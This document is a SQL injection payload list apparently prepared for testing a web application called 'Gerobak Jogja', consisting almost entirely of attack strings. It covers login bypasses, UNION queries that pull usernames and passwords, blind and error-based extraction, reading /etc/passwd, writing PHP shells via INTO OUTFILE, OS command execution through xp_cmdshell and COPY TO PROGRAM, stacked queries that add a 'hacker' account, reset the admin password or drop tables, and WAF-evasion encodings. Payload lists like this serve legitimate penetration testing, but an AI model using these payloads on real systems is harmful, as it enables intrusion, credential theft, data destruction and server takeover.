# SQL Injection Payloads for Gerobak Jogja Testing

# Basic OR-based injection
' OR '1'='1
' OR 1=1 --
' OR 1=1#
' OR 1=1/*
admin' OR '1'='1' --
admin' OR 1=1 --

# Union-based injection
' UNION SELECT 1,2,3 --
' UNION SELECT null,null,null --
' UNION SELECT 1,username,password FROM users --
' UNION SELECT 1,@@version,3 --
' UNION SELECT 1,database(),3 --
' UNION SELECT 1,user(),3 --

# Error-based injection
' AND (SELECT COUNT(*) FROM information_schema.tables) > 0 --
' AND (SELECT COUNT(*) FROM information_schema.columns) > 0 --
' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT @@version), 0x7e)) --
' AND (SELECT * FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) --

# Time-based blind injection
' AND (SELECT SLEEP(5)) --
'; WAITFOR DELAY '00:00:05' --
' AND IF(1=1, SLEEP(5), 0) --
' AND (SELECT * FROM (SELECT(SLEEP(5)))a) --

# Boolean-based blind injection
' AND 1=1 --
' AND 1=2 --
' AND (SELECT SUBSTRING(@@version,1,1))='5' --
' AND (SELECT SUBSTRING(user(),1,1))='r' --
' AND LENGTH(database())=8 --

# MySQL specific
' AND @@version LIKE '5%' --
' AND (SELECT COUNT(*) FROM mysql.user) > 0 --
' UNION SELECT 1,load_file('/etc/passwd'),3 --
' INTO OUTFILE '/var/www/html/shell.php' --

# PostgreSQL specific
' AND version() LIKE 'PostgreSQL%' --
' UNION SELECT 1,version(),3 --
'; COPY (SELECT '') TO PROGRAM 'id' --

# MSSQL specific
' AND @@version LIKE 'Microsoft%' --
'; EXEC xp_cmdshell('dir') --
' UNION SELECT 1,@@servername,3 --

# Second-order injection
admin'; INSERT INTO users VALUES ('hacker','password'); --
admin'; UPDATE users SET password='hacked' WHERE username='admin'; --
admin'; DROP TABLE products; --

# NoSQL injection (if using MongoDB)
{"$ne": null}
{"$regex": ".*"}
{"$where": "this.username == 'admin'"}

# Login bypass payloads
admin'--
admin'/*
admin' OR '1'='1'--
admin' OR '1'='1'/*
admin'OR 1=1 OR ''='
admin' OR 1=1#
admin'||'1'='1
admin' OR 'x'='x
admin') OR ('1'='1'--
admin') OR 1=1--

# Authentication bypass
' OR 1=1 LIMIT 1 --
' OR '1'='1' LIMIT 1 --
'OR 1=1 OR ''='
'OR''='
' OR 1 --
' OR 1=1 --
' OR 1=1 ({
' OR 1=1 --
'OR 1=1 OR ''='
' OR 'something' = 'something'
' OR ''='
' OR 1 = 1 --
' OR a = a
' OR 'text' = N'text'
' OR 'something' = 'some'+'thing'
' OR 'text' > 't'
' OR 'whatever' IN ('whatever')
' OR 2 > 1
' OR 'text' = N'text'
' OR 'something' = 'some'+'thing'
' OR 1 = 1
' OR 1 > 0
' OR 1 = 1 --
' OR 1 = 1 ({
' OR 1 = 1 /*

# Stacked queries
'; INSERT INTO users VALUES ('hacker','password'); --
'; UPDATE users SET password='hacked' WHERE id=1; --
'; DELETE FROM products WHERE id=1; --
'; CREATE USER hacker IDENTIFIED BY 'password'; --

# Information gathering
' UNION SELECT 1,schema_name,3 FROM information_schema.schemata --
' UNION SELECT 1,table_name,3 FROM information_schema.tables --
' UNION SELECT 1,column_name,3 FROM information_schema.columns --
' UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema=database() --

# File operations (MySQL)
' UNION SELECT 1,load_file('/etc/passwd'),3 --
' UNION SELECT 1,load_file('C:\\windows\\system32\\drivers\\etc\\hosts'),3 --
' INTO OUTFILE '/var/www/html/backdoor.php' --

# Privilege escalation
' UNION SELECT 1,grantee,3 FROM information_schema.user_privileges --
' UNION SELECT 1,user,host FROM mysql.user --

# Database fingerprinting
' AND @@version --
' AND version() --
' AND sqlite_version() --
' AND pg_version() --

# WAF bypass techniques
/*!50000SELECT*/ * FROM users
/**/UNION/**/SELECT/**/ * FROM users
UNION(SELECT(1),username,password(FROM(users)))
UNI/**/ON SE/**/LECT
+UNION+SELECT+
%20UNION%20SELECT%20
UNION%23comment%0ASELECT
UNION%2B%2BSELECT

# Encoding bypass
%27%20OR%20%271%27%3D%271
%27%20UNION%20SELECT%20
CHAR(39)+OR+CHAR(39)+1+CHAR(39)=CHAR(39)+1
0x27204f5220273127203d202731

# Double encoding
%2527%20OR%20%25271%2527%253D%25271

# Comment variations
' OR 1=1 --
' OR 1=1 #
' OR 1=1 /*
' OR 1=1 %00
' OR 1=1 %16
' OR 1=1 %23